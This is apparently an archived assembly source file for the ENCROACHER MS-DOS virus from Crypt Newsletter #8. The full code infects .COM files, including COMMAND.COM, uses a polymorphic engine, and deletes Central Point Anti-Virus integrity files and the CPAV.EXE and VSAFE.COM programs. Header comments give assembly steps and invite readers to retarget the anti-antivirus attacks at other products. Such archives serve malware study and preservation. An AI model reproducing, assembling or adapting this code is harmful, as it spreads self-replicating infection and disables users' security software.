MalwareSourceCode/MSDOS/E-Index/Virus.MSDOS.Unknown.encroach.asm
vxunderground 4b9382ddbc re-organize
push
2022-08-21 04:07:57 -05:00

339 lines
12 KiB
NASM

;***************************************************************************
; The ENCROACHER virus: Incorporating anti-virus software countermeasures
; to aid in gaining and maintaining a foothold on a CENTRAL POINT ANTIVIRUS
; protected system. Some of the ideas in ENCROACHER were inspired by Mark
; Ludwig's RETALIATOR virus (American Eagle Publishing) and Nowhere Man's
; VCL 1.0 viral assembly code library. ENCROACHER also utilizes the Mutation
; Engine for polymorphism. Edited by URNST KOUCH for Crypt Newsletter #8.
;
; 1. Assemble with TASM 2.5 with the aid of MAKE.BAT, included in issue #8.
; 2. The reader must also have the MtE091b object files (not included in
; the newsletter but commonly available as the Mutation Engine at most
; good virus info archive sites.)
; 3. Place all files in ENCROACHER assembly directory.
; 4. Execute MAKE.BAT with TASM 2.5 and TLINK.EXE in path.
;
; ENCROACHER is a simple .COM appending virus which strikes the Central Point
; Anti-virus software in a direct manner. CPAV stores a file called
; chklist.cps in every directory that contains executable programs. This file
; contains the integrity (or checksum) data on each program in that
; directory. It is the library file that CPAV refers to when scanning for
; unknown viruses. By comparing 'newly checksummed' files with its data
; in chklist.cps, CPAV locates change, corruption or generic virus infection.
; Eliminating these files before virus infection forces Central Point
; Antivirus to create new 'checklist' data for the directory, AFTER the
; virus has acted. Therefore, the virus-infected file becomes
; a legal part of Central Point's freshly calculated integrity data.
; Upon call, ENCROACHER will ALWAYS check for and erase these files, forcing
; the anti-virus software to constantly update its data, effectively
; making this feature unreliable. In my experience,
; the CPAV software does not protest the elimination of these files in an
; appropriate manner.
;
; ENCROACHER will also attempt to erase the main CENTRAL POINT A-V program
; in its default installation directory before infection. This is a
; direct attack and is more likely to be noticed than the
; disappearance and reappearance of dozens of very small chklist.cps
; files. Because it is a strong move, one can be of mixed mind about using it.
; An alert user SHOULD recognize something wrong almost immediately.
; However, it is included to illustrate the point that while it presumes
; apriori knowledge concerning the location of CPAV software on the system,
; many users can STILL be expected to be lazy (and/or stupid) and use the
; vulnerable shrink-wrapped software recommendations for installation.
;
; ENCROACHER will also target and delete VSAFE.COM, CPAV's most powerful
; program for the detection of virus-mediated opening, closing and writing
; to files. (The CPAV software also contains VSAFE as a device, VSAFE.SYS.
; The user may add attack of this component to the source code if he wishes.)
; If Central Point's DEFAULT installation is in place and VSAFE is in
; memory, ENCROACHER will remove it since, generally, the program
; is merely configured to scan for known viruses, add chklist.cps files
; to program directories and lock out writes to the boot record. If all
; of VSAFE's features are enabled, ENCROACHER WILL BE detected when it
; attempts to destroy VSAFE. However, since these VSAFE features are
; not practical for everyday computing needs, it can be
; assumed relatively safe to disregard them as a threat to ENCROACHER. (The
; reader is invited to add a routine which will make a call to VSAFE
; if in memory. If VSAFE is resident, the routine could be written to
; instruct the virus to go to sleep until the danger is past.)
;
; Central Point Anti-virus contains a third program known as VWATCH. It
; can be safely ignored by ENCROACHER.
;
; ENCROACHER's anti-virus software countermeasures can be quickly adapted
; to almost any commercial software of choice. Access to manuals or
; copies of the Norton Antivirus, Fifth Generation's Untouchable or
; Leprechaun Software's Virus-Buster have all the information needed to
; allow the homebrew researcher to reconfigure the virus so that it can
; attack these programs in an educated manner.
;
; ENCROACHER2 is a variant of ENCROACHER supplied as a DEBUG script.
; In addition to it's anti- CPAV capability, ENCROACHER2 will poison selected
; programs sometime in the evening hours.
;
; General features: ENCROACHER will infect all .COM programs in its current
; directory. When finished, it will jump to the root of the current directory
; and continue its work.
; ENCROACHER WILL NOT restore the DTA, producing a shift at the prompt.
; (Sorry, deadline was approaching for the newsletter and I had to get this
; baby to bed.)
;
; ENCROACHER has no problem infecting COMMAND.COM or NDOS.COM! The operating
; system WILL continue to load properly. ENCROACHER quickly deletes
; Central Point software programs on start-up. There is no noticeable
; delay in infection times between it and a copy of the virus lacking
; these features.
; ENCROACHER will quickly infect down the trunk of any directory structure.
;
; Keep in mind, that ENCROACHER 2 can be frustratingly destructive once
; it has spread out onto a system.
.model tiny
.radix 16
.code
extrn mut_engine: near, rnd_get: near, rnd_init: near
extrn rnd_buf: word, data_top: near
org 100h
start:
call locadr
reladr:
db 'ENCROACHER is here'
locadr:
pop dx
mov cl,4
shr dx,cl
sub dx,10
mov cx,ds
add cx,dx ;Calculate new CS
mov dx,offset begin
push cx dx
retf
begin:
cld
mov di,offset start
push es di
push cs
pop ds
mov si,offset old_cod
movsb ;Restore first 3 bytes
movsw
push ax
mov dx,offset dta_buf ;Set DTA
mov ah,1a
int 21
mov ax,3524 ;Hook INT 24
int 21
push es bx
mov dx,offset fail_err
mov ax,2524
int 21
killcps: ; clear CPS integrity files from startup directory
mov dx,offset killfile ; DX points to data mask: chklist.cps
mov ah,04Eh ; DOS find first file function
mov cx,00100111b ; All file attributes valid
int 021h
jc erase_done ; Exit procedure on failure
mov ah,02Fh ; DOS get DTA function
int 021h
lea dx,[bx + 01Eh] ; DX points to filename in DTA
erase_loop:
mov ah,041h ; DOS delete file function
int 021h
mov ah,03Ch ; DOS create file function
xor cx,cx ; No attributes for new file
int 021h
mov ah,041h ; DOS delete file function
int 021h
mov ah,04Fh ; DOS find next file function
int 021h
jnc erase_loop ; Repeat until no files left
erase_done:
jmp killcpav ; chklist.cps gone, go for CPAV.EXE
; in factory installation
killcpav: ; clear CPAV master executable from default directory
mov dx,offset killfile2 ; DX points to filename
mov ah,41h ; DOS erase file function
int 21h
jc killvsafe
killvsafe:
mov dx,offset killfile3
mov ah,41h
int 21h
jc erase_done2
erase_done2:
jmp getonwithit
getonwithit: ;get on with infecting files
xor ax,ax ;Initialize random number generator
mov [rnd_buf],ax ;for Mutation Engine use
call rnd_init
push sp
pop cx
sub cx,sp
add cx,4
push cx
find_lup1:
mov dx,offset srchnam ;COMfile mask for clean file search
mov cl,3
mov ah,4e ;find a file
find_lup2:
int 21 ;Find the next COM file
jc ch_dir ;if no files or no uninfected files in current dir, change to root
cmp [dta_buf+1a],ch
jnz infect ;If not infected, infect it now
pop cx
find_nxt:
push cx
mov dx,offset dta_buf
mov ah,4f ;found an infected file, find another
jmp find_lup2
ch_dir:
mov dx,offset dotdot
mov ah,3bh ; Change directory to root of current
int 21h
jnc find_lup1 ; Carry set if in root
; loop to search for clean files
infect_done:
pop cx
loop find_nxt
jnc exit2
call rnd_get ;extraneous garbage code
test al,1 ; " " "
jz exit2 ; " " "
exit1: popf ;return control and get set to clean up
exit2:
pop dx ds
mov ax,2524 ;Restore old INT 24
int 21
push ss
pop ds
mov dx,80 ;Restore DTA
mov ah,1a
int 21
push ds ;Exit to host program
pop es
pop ax
retf
infect:
xor cx,cx ;Reset read-only attribute
mov dx,offset dta_buf+1e
mov ax,4301
int 21
jc infect_done ;if fail, get set to leave
mov ax,3d02 ;Open the file
int 21
jc infect_done ;if fail, get set to leave
xchg ax,bx
mov dx,offset old_cod ;Read first 3 bytes
mov cx,3
mov ah,3f
int 21
jc read_done ;file already infected, skip it
mov ax,word ptr [old_cod] ;Make sure it's not an EXE file
cmp ax,'ZM'
jz read_done ;if it is, skip it
cmp ax,'MZ'
jz read_done
xor cx,cx ;Seek to end of file
xor dx,dx
mov ax,4202
int 21
test dx,dx ;Make sure the file is not too big
jnz read_done
cmp ax,-2000
jnc read_done
mov bp,ax
sub ax,3
mov word ptr [new_cod+1],ax
mov ax,5700 ;Save file's date/time
int 21
push dx cx
mov ax,offset data_top+0f
mov cl,4 ;Now call the Mutation Engine
shr ax,cl
mov cx,cs
add ax,cx
mov es,ax
mov dx,offset start ;dx points to start of ENCROACHER
mov cx,offset _DATA ;cx contains ENCROACHER length
push bp bx
add bp,dx ;bp contains address where MtE hands control to ENCROACH
xor si,si ;si=0, MtE required value
xor di,di ;di=0, MtE required value
mov bl,0f ;bl=0f,MtE 'medium' model required
mov ax,101 ;set bit-field in ax, MtE values
call mut_engine
pop bx ax
add ax,cx ;Make sure file length mod 256 = 0
neg ax
xor ah,ah
add cx,ax
mov ah,40 ;Put the virus into the file
int 21
push cs
pop ds
sub cx,ax
xor dx,dx ;Write the JMP instruction
mov ax,4200
int 21
mov dx,offset new_cod
mov cx,3
mov ah,40
int 21
write_done:
pop cx dx ;Restore file's date/time
mov ax,5701
int 21
jmp read_done2
read_done:
mov ah,3e ;Close the file
int 21
jmp infect_done ;in this case, no infection so
;try for another search
read_done2:
mov ah,3e
int 21
jmp exit1 ;successfully infected file,
;jump to host execution
fail_err: ;Critical error handler
mov al,3 ;protects ENCROACHER from exposing
iret ;itself on a write-protected disk
;or diskette
srchnam db '*.COM',0
killfile db 'CHKLIST.CPS',0 ;CPAV file integrity data archive
killfile2 db 'C:\CPAV\CPAV.EXE',0 ;default location and name of
;CPAV master program
killfile3 db 'C:\CPAV\VSAFE.COM',0 ;CPAV r/w resident protection program
old_cod: ;Buffer to read first 3 bytes
ret
dw ?
new_cod: ;Buffer to write first 3 bytes
jmp $+100
.data
dotdot db '..',0 ;change directory trick
dta_buf db 2bh dup(?) ;Buffer for DTA
end start